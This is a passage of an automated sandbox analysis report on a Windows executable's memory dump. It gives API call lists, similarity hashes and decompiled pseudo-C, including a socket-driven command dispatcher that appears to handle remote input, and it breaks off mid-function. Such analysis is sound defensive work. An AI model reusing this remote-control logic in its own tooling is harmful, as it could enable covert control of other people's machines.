0x00409837
0x0040983b
0x0040983f
0x00409846
0x00409849
0x0040984c
0x00409851
0x00409852
0x00409853
0x00409855
0x00409856
0x00409856
0x00409856
0x00409859
0x0040985a
0x00409860
0x00409860
0x00409831
0x00409367
0x00409367
0x0040936d
0x0040936d
0x00000000
0x0040936d

APIs

getaddrinfo.WS2_32(?,00000000), ref: 00409471
sendto.WS2_32(00000001,00000017,00000000,00000000,?,00000080), ref: 0040959F
recvfrom.WS2_32(000000FF,00000080,0000FFFF,00000000,?,00000080), ref: 004095DF
sendto.WS2_32(?,00000000,00000000,00000000,?,00000000), ref: 0040965C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: sendto$getaddrinforecvfrom
String ID:
API String ID: 43035728-0
Opcode ID: bc1bb69daaf6dcf0d9b57f56232e275b9751d6ac2cd795a8fff03965cd9da1d2
Instruction ID: 1540b4e63258d7c4570a20e4c524607f5c691ad94eb72f74025f99fd132bb67f
Opcode Fuzzy Hash: bc1bb69daaf6dcf0d9b57f56232e275b9751d6ac2cd795a8fff03965cd9da1d2
Instruction Fuzzy Hash: 9E71D5724083419BD724DB25C885BAFB3E5AFC8704F044E2EF4955B2C2E278DD45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004067E7, Relevance: 6.2, APIs: 4, Instructions: 177
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004067E7(void* __esi) {
				signed int _t147;
				void* _t157;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t165;
				void* _t170;
				void* _t174;
				void* _t192;
				void* _t197;
				signed int _t200;
				void* _t201;
				void* _t202;

				L0:
				while(E00414C40(_t170, __esi, 1) != 0) {
					__eax = __esp + 0x48;
					2 = E00414B90(2, __ebx, __esi, __esp + 0x48);
					if(__al == 0) {
						break;
					}
					__ecx =  *(__esp + 0x48) & 0x0000ffff;
					__ebp =  *(__esp + 0x20);
					__ecx = __ecx & 0x000000ff;
					__eax = (__ecx & 0x000000ff) << 8;
					__eax = __eax | __ecx;
					 *(__ebp + 0x4c) = 0;
					 *(__ebp + 0x48) = __ax;
					if(__ax == 0) {
						L39:
						__eax =  *(__ebp + 0x4c);
						__eax = __eax << 0x10;
						__eax = __eax & 0x0000ff00;
						__edx = __eax << 0x00000010 | __eax & 0x0000ff00;
						__eax = __eax >> 8;
						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 8;
						__ecx = __eax >> 0x00000008 & 0x0000ff00;
						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00;
						__ecx =  *(__ebp + 0x4f) & 0x000000ff;
						__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
						 *(__ebp + 0x50) = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
						if(__eax != 5) {
							__eax =  *(__ebp + 0x1c);
							__eax = E004107C0( *(__ebp + 0x1c));
							 *(__ebp + 0x1c) = 0;
							L1:
							while(1) {
								L1:
								while(1) {
									L1:
									while(1) {
										L1:
										while(1) {
											L1:
											while( *(_t202 + 0x24) > 0) {
												_t157 = E004151B0(0, _t202 + 0x194, 0x12c, 0);
												if(_t157 != 0xffffffff) {
													break;
												}
												__imp__#111();
												if(_t157 != 0x274c) {
													goto L83;
												} else {
													_t158 =  *(_t202 + 0x19c);
													if(_t158 != 0) {
														WaitForSingleObject(_t158, 0xffffffff);
													}
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x194)) + 0x10))))();
													_t200 =  *(_t202 + 0x24);
													_t192 = 0;
													if(_t200 == 0) {
														L17:
														_t161 =  *(_t202 + 0x19c);
														if(_t161 != 0) {
															ReleaseMutex(_t161);
														}
														continue;
													} else {
														_t174 = 0;
														_t201 = _t200 + _t200 * 8;
														do {
															_t163 =  *((intOrPtr*)(_t202 + 0x14));
															_t197 = _t174 + _t163;
															if( *((short*)(_t174 + _t163 + 5)) > 0 &&  *((short*)(_t197 + 7)) > 0) {
																_t165 = E00405C70( *((intOrPtr*)(_t202 + 0x20)),  *((intOrPtr*)(_t202 + 0x190)), _t197);
																if(_t165 == 0xffffffff || _t165 == 0) {
																	if( *(_t202 + 0x19c) != 0) {
																		ReleaseMutex( *(_t202 + 0x19c));
																	}
																	goto L83;
																} else {
																	if(_t165 == 1) {
																		_t16 = _t192 + 1; // 0x1
																		if(_t16 !=  *(_t202 + 0x24)) {
																			E00410870(_t165, _t197, 0, 9);
																		} else {
																			 *(_t202 + 0x24) =  *(_t202 + 0x24) - 1;
																			_t201 = _t201 - 9;
																			E00410740(_t201, _t202 + 0x14);
																		}
																	}
																	goto L16;
																}
															}
															L16:
															_t192 = _t192 + 1;
															_t174 = _t174 + 9;
														} while (_t192 <  *(_t202 + 0x24));
														goto L17;
													}
												}
											}
											if(E00414B90(1,  *((intOrPtr*)(_t202 + 0x190)), 0x1b7740, _t202 + 0x13) == 0) {
												goto L83;
											}
											_t147 =  *(_t202 + 0x13) & 0x000000ff;
											if(_t147 > 6) {
												goto L83;
											}
											switch( *((intOrPtr*)(_t147 * 4 +  &M00406C98))) {
												case 0:
													if(E00414C40(_t172, 0x1b7740, 3) == 0 || E00414B90(0x10, _t172, 0x1b7740, _t202 + 0x4c) == 0) {
														goto L83;
													} else {
														_t151 =  *(_t202 + 0x4c);
														if(_t151 == 0x20 || _t151 == 0x10 || _t151 == 8) {
															if( *((char*)(_t202 + 0x4f)) == 0) {
																goto L83;
															}
															_t182 =  *((intOrPtr*)(_t202 + 0x50));
															asm("rol dx, 0x8");
															asm("rol ax, 0x8");
															asm("rol cx, 0x8");
															 *((short*)(_t202 + 0x5c)) =  *((intOrPtr*)(_t202 + 0x54));
															 *(_t202 + 0x58) = _t182;
															 *((char*)(_t202 + 0x5b)) = 1;
															 *((char*)(_t202 + 0x5a)) = _t182 & 0xffffff00 |  *((char*)(_t202 + 0x52)) != 0x00000000;
															 *(E00410820( *((intOrPtr*)(_t202 + 0x28)) + 0x31, _t202 + 0x50, 0x10) + 0x41) =  *(_t202 + 0x4c) >> 3;
															goto L1;
														} else {
															goto L83;
														}
													}
												case 1:
													goto L83;
												case 2:
													goto L0;
												case 3:
													__edx = __esp + 0x38;
													9 = E00414B90(9, __ebx, __esi, __esp + 0x38);
													if(__al == 0) {
														goto L83;
													}
													__eax =  *(__esp + 0x39) & 0x0000ffff;
													__dx =  *((intOrPtr*)(__esp + 0x3d));
													asm("rol ax, 0x8");
													asm("rol cx, 0x8");
													 *(__esp + 0x39) = __ax;
													__eax =  *(__esp + 0x3f) & 0x0000ffff;
													asm("rol dx, 0x8");
													asm("rol ax, 0x8");
													__ecx = __ecx & 0xffffff00 |  *(__esp + 0x38) != 0x00000000;
													 *(__esp + 0x38) = __cl;
													__ecx =  *(__esp + 0x24);
													__edi = 0;
													 *((short*)(__esp + 0x3d)) = __dx;
													 *(__esp + 0x3f) = __ax;
													if(__ecx == 0) {
														L50:
														if(__edi != __ecx) {
															L52:
															__eax =  *(__esp + 0x14);
															__edx = __esp + 0x3c;
															__eax + __edi * 8 = __eax + __edi * 8 + __edi;
															__eax = E00410820(__eax + __edi * 8 + __edi, __esp + 0x3c, 9);
															goto L1;
														}
														__ecx = __ecx + 1;
														 *(__esp + 0x24) = __ecx;
														__ecx = __ecx + __ecx * 8;
														__esi = __esp + 0x14;
														__eax = E00410740(__ecx, __esi);
														if(__al == 0) {
															goto L83;
														}
														goto L52;
													}
													__eax =  *(__esp + 0x14);
													__eax =  *(__esp + 0x14) + 7;
													while( *((short*)(__eax - 2)) != 0 ||  *__eax != 0) {
														__edi = __edi + 1;
														__eax = __eax + 9;
														if(__edi < __ecx) {
															continue;
														}
														goto L50;
													}
													goto L50;
												case 4:
													__edx = __esp + 0x74;
													__eax = 7;
													__eax = E00414B90(7, __ebx, __esi, __esp + 0x74);
													if(__al == 0) {
														goto L83;
													}
													__eax = __eax & 0xffffff00 |  *(__esp + 0x74) != 0x00000000;
													__ecx = __al & 0x000000ff;
													__eax =  *(__esp + 0x77);
													_push(__al & 0x000000ff);
													__edx = __eax;
													__eax = __eax >> 0x10;
													__edx = __eax & 0x00ff0000;
													__edx = __eax & 0x00ff0000 | __eax >> 0x00000010;
													__ecx = __eax;
													__ecx = __eax << 0x10;
													__ecx = __ecx | __eax;
													__eax =  *(__esp + 0x198);
													__ecx = __ecx << 8;
													__edx = __edx | __ecx;
													__ecx =  *__eax;
													__eax =  *(__eax + 0x14);
													__eax =  *__eax();
													goto L1;
												case 5:
													__ecx = __esp + 0x18;
													5 = E00414B90(5, __ebx, __esi, __esp + 0x18);
													if(__al == 0) {
														goto L83;
													}
													__dx =  *(__esp + 0x19);
													__ax =  *(__esp + 0x1b);
													asm("rol dx, 0x8");
													asm("rol ax, 0x8");
													 *((short*)(__esp + 0x1d)) = __dx;
													 *(__esp + 0x1f) = __ax;
													__edi = 0;
													__esi = 0x8000;
													GetSystemMetrics(0x17) = __eax & 0xffffff00 | __eax != 0x00000000;
													if( *(__esp + 0x19) !=  *((intOrPtr*)(__esp + 0x31))) {
														L58:
														__esi = 0x8001;
														L59:
														__dl =  *((intOrPtr*)(__esp + 0x30));
														__cl =  *(__esp + 0x18);
														__cl =  *(__esp + 0x18) & 0x00000001;
														if(__cl != (__dl & 0x00000001)) {
															__ecx = __al & 0x000000ff;
															if(__cl == 0) {
																__ecx =  ~__ecx;
																asm("sbb ecx, ecx");
																__ecx = __ecx & 0x0000000c;
																__ecx = __ecx + 4;
															} else {
																__ecx =  ~__ecx;
																asm("sbb ecx, ecx");
																__ecx = __ecx & 0x00000006;
																__ecx = __ecx + 2;
															}
															__esi = __esi | __ecx;
														}
														__cl =  *(__esp + 0x18);
														__cl =  *(__esp + 0x18) & 0x00000004;
														if(__cl != (__dl & 0x00000004)) {
															if(__cl == 0) {
																__al & 0x000000ff =  ~(__al & 0x000000ff);
																asm("sbb ecx, ecx");
																 ~(__al & 0x000000ff) & 0xfffffff4 = ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x10;
																__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x00000010;
															} else {
																__al & 0x000000ff =  ~(__al & 0x000000ff);
																asm("sbb eax, eax");
																 ~(__al & 0x000000ff) & 0xfffffffa = ( ~(__al & 0x000000ff) & 0xfffffffa) + 8;
																__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffffa) + 0x00000008;
															}
														}
														__cl =  *(__esp + 0x18);
														__al = __cl;
														__al = __cl & 0x00000002;
														if(__al != __dl) {
															__al & 0x000000ff =  ~(__al & 0x000000ff);
															asm("sbb edx, edx");
															 ~(__al & 0x000000ff) & 0xffffffe0 = ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x40;
															__esi = __esi | ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x00000040;
														}
														if((__cl & 0x00000008) != 0) {
															__esi = __esi | 0x00000800;
															__edi = 0x78;
														}
														if((__cl & 0x00000010) != 0) {
															__esi = __esi | 0x00000800;
															__edi = 0xffffff88;
														}
														__eax = __esp + 0x1c;
														__ecx = __esp + 0x38;
														__eax = E00410820(__esp + 0x38, __esp + 0x1c, 5);
														__edx =  *(__esp + 0x1b) & 0x0000ffff;
														__eax =  *(__esp + 0x19) & 0x0000ffff;
														_push(__edi);
														_push(__edx);
														_push(__eax);
														__eax =  *(__esp + 0x1a0);
														__ecx =  *__eax;
														__eax =  *(__eax + 0x18);
														__edx = __esi;
														__eax =  *__eax();
														goto L1;
													}
													__dx =  *((intOrPtr*)(__esp + 0x33));
													if( *(__esp + 0x1b) == __dx) {
														goto L59;
													}
													goto L58;
												case 6:
													__ecx = __esp + 0x7c;
													3 = E00414B90(3, __ebx, __esi, __esp + 0x7c);
													if(__al == 0) {
														goto L83;
													}
													__edx = __esp + 0x2c;
													4 = E00414B90(4, __ebx, __esi, __esp + 0x2c);
													if(__al == 0) {
														goto L83;
													}
													__ecx =  *(__esp + 0x2c);
													__ecx = __ecx & 0x00ff0000;
													__ecx = __ecx >> 0x10;
													__eax = __ecx & 0x00ff0000 | __ecx >> 0x00000010;
													__edx = __ecx;
													__edx = __ecx << 0x10;
													__edx = __edx | __ecx;
													__eax = __eax >> 8;
													__eax = __eax | __edx;
													 *(__esp + 0x2c) = __eax;
													__eax = __eax + 1;
													__edi = __eax;
													if(__edi == 0) {
														0 = E004107C0(0);
														goto L83;
													}
													 *(__esp + 0x2c) = E00414B90( *(__esp + 0x2c), __ebx, __esi, __edi);
													if(__al == 0) {
														goto L83;
													}
													__eax =  *(__esp + 0x194);
													__ecx =  *__eax;
													__edx =  *(__esp + 0x2c);
													__eax =  *(__eax + 0x1c);
													_push(__edi);
													__eax =  *__eax();
													__eax = __edi;
													__eax = E004107C0(__edi);
													goto L1;
											}
										}
									}
								}
							}
						}
						if( *(__ebp + 0x1c) != 0) {
							goto L1;
						}
						__edx =  *0x42e6d4;
						__eax = HeapAlloc( *0x42e6d4, 8, 0x404);
						__ecx =  *(__esp + 0x20);
						 *( *(__esp + 0x20) + 0x1c) = __eax;
						if(__eax != 0) {
							goto L1;
						}
						break;
					}
					__ebx = __ax & 0x0000ffff;
					__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
					__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
					__edi = __ebp + 0x44;
					__ecx = __ebx;
					__esi = __edi;
					__eax = E00410740(__ebx, __esi);
					if(__al == 0) {
						break;
					}
					__ecx =  *__edi;
					__eax = __ebx;
					__ebx =  *(__esp + 0x190);
					__esi = 0x1b7740;
					__eax = E00414B90(__eax, __ebx, 0x1b7740,  *__edi);
					if(__al == 0) {
						break;
					}
					__edx = 0;
					__esi = 0;
					if(__dx >=  *(__ebp + 0x48)) {
						goto L39;
					}
					__edx =  *__edi;
					do {
						__eax = __si & 0x0000ffff;
						__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff);
						__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff);
						__ecx =  *(__edx + __eax);
						__ecx = __ecx << 0x10;
						__ecx = __ecx & 0x0000ff00;
						__ebx = __ecx << 0x00000010 | __ecx & 0x0000ff00;
						__ebp =  *(__eax + __edx + 3) & 0x000000ff;
						__ebx = (__ecx << 0x00000010 | __ecx & 0x0000ff00) << 8;
						__ecx = __ecx >> 8;
						__ebx = __ebx |  *(__eax + __edx + 3) & 0x000000ff;
						__ebx = __ebx | __ecx;
						 *(__edx + __eax) = __ebx;
						__edx =  *__edi;
						if( *(__edx + __eax) == 5) {
							__eax =  *(__esp + 0x20);
							 *((intOrPtr*)( *(__esp + 0x20) + 0x4c)) = 5;
						}
						__ecx =  *(__esp + 0x20);
						__esi = __esi + 1;
					} while (__si <  *((intOrPtr*)(__ecx + 0x48)));
					__ebp = __ecx;
					goto L39;
				}
				L83:
				E00406260( *((intOrPtr*)(_t202 + 0x20)));
				return E004107C0( *((intOrPtr*)(_t202 + 0x14)));
			}

0x00000000
0x004067e7
0x004067f8
0x00406802
0x00406809
0x00000000
0x00000000
0x0040680f
0x00406814
0x0040681a
0x0040681f
0x00406825
0x00406827
0x0040682e
0x00406835
0x004068d1
0x004068d1
0x004068d6
0x004068db
0x004068e1
0x004068e5
0x004068e8
0x004068eb
0x004068f1
0x004068f3
0x004068f7
0x004068f9
0x004068ff
0x00406933
0x00406936
0x0040693b
0x00000000
0x0040660f
0x00000000
0x0040660f
0x00000000
0x0040660f
0x00000000
0x0040660f
0x00000000
0x0040660f
0x0040662a
0x00406632
0x00000000
0x00000000
0x00406638
0x00406643
0x00000000
0x00406649
0x00406649
0x00406652
0x00406657
0x00406657
0x00406669
0x0040666b
0x0040666f
0x00406673
0x004066ef
0x004066ef
0x004066f8
0x004066ff
0x004066ff
0x00000000
0x00406675
0x00406675
0x00406677
0x00406680
0x00406680
0x0040668a
0x0040668d
0x004066a3
0x004066ab
0x00406c33
0x00406c3d
0x00406c3d
0x00000000
0x004066b9
0x004066bc
0x004066be
0x004066c5
0x004066e0
0x004066c7
0x004066c7
0x004066cb
0x004066d4
0x004066d4
0x004066c5
0x00000000
0x004066bc
0x004066ab
0x004066e5
0x004066e5
0x004066e6
0x004066e9
0x00000000
0x00406680
0x00406673
0x00406643
0x00406727
0x00000000
0x00000000
0x0040672d
0x00406735
0x00000000
0x00000000
0x0040673b
0x00000000
0x0040674d
0x00000000
0x0040676a
0x0040676a
0x00406770
0x00406783
0x00000000
0x00000000
0x00406789
0x00406798
0x0040679c
0x004067a7
0x004067b9
0x004067be
0x004067ca
0x004067cf
0x004067df
0x00000000
0x00000000
0x00000000
0x00000000
0x00406770
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406947
0x00406951
0x00406958
0x00000000
0x00000000
0x0040695e
0x00406968
0x0040696d
0x00406971
0x00406975
0x0040697a
0x0040697f
0x00406983
0x00406991
0x00406994
0x00406998
0x0040699c
0x0040699e
0x004069a3
0x004069aa
0x004069c8
0x004069ca
0x004069e5
0x004069e5
0x004069eb
0x004069f3
0x004069f6
0x00000000
0x004069f6
0x004069cc
0x004069cd
0x004069d1
0x004069d4
0x004069d8
0x004069df
0x00000000
0x00000000
0x00000000
0x004069df
0x004069ac
0x004069b0
0x004069b3
0x004069c0
0x004069c1
0x004069c6
0x00000000
0x00000000
0x00000000
0x004069c6
0x00000000
0x00000000
0x00406a00
0x00406a05
0x00406a0a
0x00406a11
0x00000000
0x00000000
0x00406a1c
0x00406a1f
0x00406a22
0x00406a26
0x00406a27
0x00406a2b
0x00406a2e
0x00406a34
0x00406a36
0x00406a38
0x00406a40
0x00406a42
0x00406a49
0x00406a4f
0x00406a51
0x00406a53
0x00406a56
0x00000000
0x00000000
0x00406a5d
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a74
0x00406a79
0x00406a7e
0x00406a82
0x00406a88
0x00406a8d
0x00406a92
0x00406a94
0x00406aa6
0x00406aae
0x00406abc
0x00406abc
0x00406ac1
0x00406ac1
0x00406ac5
0x00406acb
0x00406ad3
0x00406ad7
0x00406ada
0x00406ae8
0x00406aea
0x00406aec
0x00406aef
0x00406adc
0x00406adc
0x00406ade
0x00406ae0
0x00406ae3
0x00406ae3
0x00406af2
0x00406af2
0x00406af4
0x00406afa
0x00406b02
0x00406b06
0x00406b1c
0x00406b1e
0x00406b23
0x00406b26
0x00406b08
0x00406b0b
0x00406b0d
0x00406b12
0x00406b15
0x00406b15
0x00406b06
0x00406b28
0x00406b2c
0x00406b2e
0x00406b35
0x00406b3a
0x00406b3c
0x00406b41
0x00406b44
0x00406b44
0x00406b49
0x00406b4b
0x00406b51
0x00406b51
0x00406b59
0x00406b5b
0x00406b61
0x00406b61
0x00406b68
0x00406b6d
0x00406b72
0x00406b77
0x00406b7c
0x00406b81
0x00406b82
0x00406b83
0x00406b84
0x00406b8b
0x00406b8d
0x00406b90
0x00406b92
0x00000000
0x00406b92
0x00406ab0
0x00406aba
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b99
0x00406ba3
0x00406baa
0x00000000
0x00000000
0x00406bb0
0x00406bba
0x00406bc1
0x00000000
0x00000000
0x00406bc7
0x00406bcd
0x00406bd4
0x00406bd7
0x00406bd9
0x00406bdb
0x00406be4
0x00406be6
0x00406bec
0x00406bee
0x00406bf2
0x00406bf8
0x00406bfc
0x00406c47
0x00000000
0x00406c47
0x00406c03
0x00406c0a
0x00000000
0x00000000
0x00406c0c
0x00406c13
0x00406c15
0x00406c19
0x00406c1c
0x00406c1d
0x00406c1f
0x00406c21
0x00000000
0x00000000
0x0040673b
0x0040660f
0x0040660f
0x0040660f
0x0040660f
0x00406905
0x00000000
0x00000000
0x0040690b
0x00406919
0x0040691f
0x00406923
0x00406928
0x00000000
0x00000000
0x00000000
0x0040692e
0x0040683b
0x0040683e
0x00406840
0x00406842
0x00406845
0x00406847
0x00406849
0x00406850
0x00000000
0x00000000
0x00406856
0x00406858
0x0040685a
0x00406862
0x00406867
0x0040686e
0x00000000
0x00000000
0x00406874
0x00406876
0x0040687c
0x00000000
0x00000000
0x0040687e
0x00406880
0x00406880
0x00406883
0x00406885
0x00406887
0x0040688c
0x00406891
0x00406897
0x00406899
0x0040689e
0x004068a1
0x004068a4
0x004068ac
0x004068ae
0x004068b1
0x004068b7
0x004068b9
0x004068bd
0x004068bd
0x004068c4
0x004068c8
0x004068c9
0x004068cf
0x00000000
0x004068cf
0x00406c4c
0x00406c50
0x00406c68

APIs

Part of subcall function 00414C40: select.WS2_32(00000000,?,00000000,00000000,00007531), ref: 00414CC0
Part of subcall function 00414C40: recv.WS2_32(00000104,?,00000001,00000000), ref: 00414CD0

Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01

HeapAlloc.KERNEL32(?,00000008,00000404), ref: 00406919

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heaprecvselect$AllocFree
String ID:
API String ID: 2756876686-0
Opcode ID: e7038a37d01650b98b511b9f7d8eeda9fc9af24b94b655a357c40630a156fa68
Instruction ID: a52349a79fa3c7aa71aae239d12b090e3c4574977716c5ddd609077100441058
Opcode Fuzzy Hash: e7038a37d01650b98b511b9f7d8eeda9fc9af24b94b655a357c40630a156fa68
Instruction Fuzzy Hash: 7A51D1316083058BD724DF65C8807AA73E1BF84308F01493EE99AA73D1DB7DDD558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004244A0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 147
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004244A0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v8;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v49;
				void* _v60;
				char _v61;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t52;
				void* _t53;
				void* _t61;
				intOrPtr* _t66;
				void* _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				void* _t86;

				_v49 = 0;
				_t77 = E00418BD0(_a4, 0x20000000,  *_a8);
				if(_t77 == 0) {
					L36:
					return _v49;
				}
				_t86 = E00418C20(_t77);
				_v40 = _t86;
				if(_t86 == 0) {
					goto L36;
				}
				_t79 =  *((intOrPtr*)(_t77 + 0xc));
				if(_t79 < 2 ||  *((char*)(_t86 + _t79 - 1)) != 0 ||  *((char*)(_t86 + _t79 - 2)) != 0 || _t79 == 0) {
					L35:
					HeapFree( *0x42e6d4, 0, _t86);
					goto L36;
				} else {
					_t47 = HeapAlloc( *0x42e6d4, 8, _t79 + 4);
					_v44 = _t47;
					if(_t47 == 0) {
						goto L35;
					}
					_t61 = _t47;
					_v48 = _t61;
					while(1) {
						_t81 = 0;
						if(_t86 == 0 ||  *_t86 == 0) {
							goto L12;
						}
						do {
							_t81 = _t81 + 1;
						} while ( *((char*)(_t81 + _t86)) != 0);
						L12:
						_t66 = _a12;
						_t48 = 0;
						_v36 = 0x2a23;
						_v32 = _t66;
						if(_t66 == 0 ||  *_t66 == 0) {
							L16:
							_v28 = _t48;
							_v24 = _t86;
							_v20 = _t81;
							_v8 = 1;
							if(E00412090( &_v36) == 0) {
								_t50 = _t81;
								if(_t81 != 0xffffffff) {
									L22:
									 *((char*)(E00410820(_t61, _t86, _t50) + _t61)) = 0;
									_t26 = _t81 + 1; // 0x1
									_t52 = _t61 + _t26;
									_v60 = _t52;
									 *_t52 = 0;
									_t61 = _t52;
									L23:
									_t53 = 0;
									goto L24;
									do {
										do {
											L24:
											_t86 = _t86 + 1;
										} while ( *((char*)(_t86 - 1)) != 0);
										if( *_t86 == 0) {
											if(_v49 == 1) {
												if(_t61 == _v44) {
													_v48 = _t61 - 1;
												}
												if(E00418BD0(_a4, 0x20000000,  *_a8) == 0) {
													_v49 = 0;
												} else {
													_v61 = E00418A80(_t56, _a8, _v44, _v48 - _v44 + 1);
												}
											}
											HeapFree( *0x42e6d4, 0, _v44);
											_t86 = _v40;
											goto L35;
										}
										_t53 = _t53 + 1;
									} while (_t53 != 1);
									continue;
								}
								_t50 = 0;
								if(_t86 != 0 &&  *_t86 != 0) {
									do {
										_t50 = _t50 + 1;
									} while ( *((char*)(_t50 + _t86)) != 0);
								}
								goto L22;
							}
							_v49 = 1;
							goto L23;
						} else {
							do {
								_t48 = _t48 + 1;
							} while ( *((char*)(_t48 + _t66)) != 0);
							goto L16;
						}
					}
				}
			}

0x004244b9
0x004244c3
0x004244c7
0x00424649
0x00424653
0x00424653
0x004244d2
0x004244d4
0x004244da
0x00000000
0x00000000
0x004244e0
0x004244e6
0x00424639
0x00424643
0x00000000
0x0042450a
0x00424517
0x0042451d
0x00424523
0x00000000
0x00000000
0x00424529
0x0042452b
0x00424530
0x00424530
0x00424534
0x00000000
0x00000000
0x00424540
0x00424540
0x00424541
0x00424547
0x00424547
0x0042454a
0x0042454c
0x00424553
0x00424559
0x00424567
0x0042456b
0x0042456f
0x00424573
0x00424577
0x00424586
0x0042458f
0x00424594
0x004245a7
0x004245af
0x004245b3
0x004245b3
0x004245b7
0x004245bb
0x004245be
0x004245c0
0x004245c0
0x004245c0
0x004245c2
0x004245c2
0x004245c2
0x004245c2
0x004245c3
0x004245cc
0x004245de
0x004245e4
0x004245e7
0x004245e7
0x004245ff
0x0042461d
0x00424601
0x00424617
0x00424617
0x004245ff
0x0042462f
0x00424635
0x00000000
0x00424635
0x004245ce
0x004245cf
0x00000000
0x004245d4
0x00424596
0x0042459a
0x004245a0
0x004245a0
0x004245a1
0x004245a0
0x00000000
0x0042459a
0x00424588
0x00000000
0x00424560
0x00424560
0x00424560
0x00424561
0x00000000
0x00424560
0x00424559
0x00424530

APIs

Part of subcall function 00418C20: HeapFree.KERNEL32(?,00000000,00000000,00000010,?,00000000,?,?,0041ACB1,?,?,?,743C1521,00000002), ref: 00418C74

HeapAlloc.KERNEL32(?,00000008,?), ref: 00424517
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0042462F
HeapFree.KERNEL32(?,00000000,00000000), ref: 00424643

Strings

#*, xrefs: 0042454C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc
String ID: #*
API String ID: 3901518246-617327688
Opcode ID: 779aef63a4bb1bb7d6f41332fdad755cc3ca6bb1342049ab7c952626a0dd55e2
Instruction ID: a6e1a9406171abada64498b1aa2e8fb31b61d3cd93edb728c5cb99cb3c905c8b
Opcode Fuzzy Hash: 779aef63a4bb1bb7d6f41332fdad755cc3ca6bb1342049ab7c952626a0dd55e2
Instruction Fuzzy Hash: 4D51B270A093A1AFD721CF24A440B6BBBD5EFC6710F84065EE9C487381D678DC85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00422838, Relevance: 6.1, APIs: 4, Instructions: 133
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00422838(int __esi, void* __eflags) {
				intOrPtr _t37;
				void* _t42;
				intOrPtr _t49;
				intOrPtr _t52;
				void* _t58;
				void* _t64;
				intOrPtr _t85;
				void* _t87;
				void* _t89;
				int _t90;
				void* _t97;
				void* _t100;

				_t90 = __esi;
				do {
					_t85 =  *((intOrPtr*)(_t100 + 0x20));
					 *((intOrPtr*)(_t100 + 0x34)) = _t90 + 1;
					_t37 = E00416420( *((intOrPtr*)(_t100 + 0x1c)), _t100 + 0xc8, _t100 + 0x44, 0xff);
					 *((intOrPtr*)(_t100 + 0x14)) = _t37;
					if(_t37 != 0xffffffff && _t37 != 0) {
						_t10 = _t97 + 0x1fe; // 0x1fe
						_t64 = _t10;
						_t49 = E00416420( *(_t100 + 0x10), _t100 + 0xc8, _t100 + 0x38, 0xff);
						 *((intOrPtr*)(_t100 + 0x14)) = _t49;
						if(_t49 != 0xffffffff && _t49 != 0) {
							_t52 = E00416420( *(_t100 + 0x18), _t100 + 0xc8, _t100 + 0x30, 0xff);
							 *((intOrPtr*)(_t100 + 0x14)) = _t52;
							if(_t52 != 0xffffffff && _t52 != 0 && E004212F0(_t85) > 0) {
								_t89 = E00416580( *(_t100 + 0x10), _t100 + 0xc4, _t100 + 0x4c);
								if(_t89 < 1 || _t89 > 0xffff) {
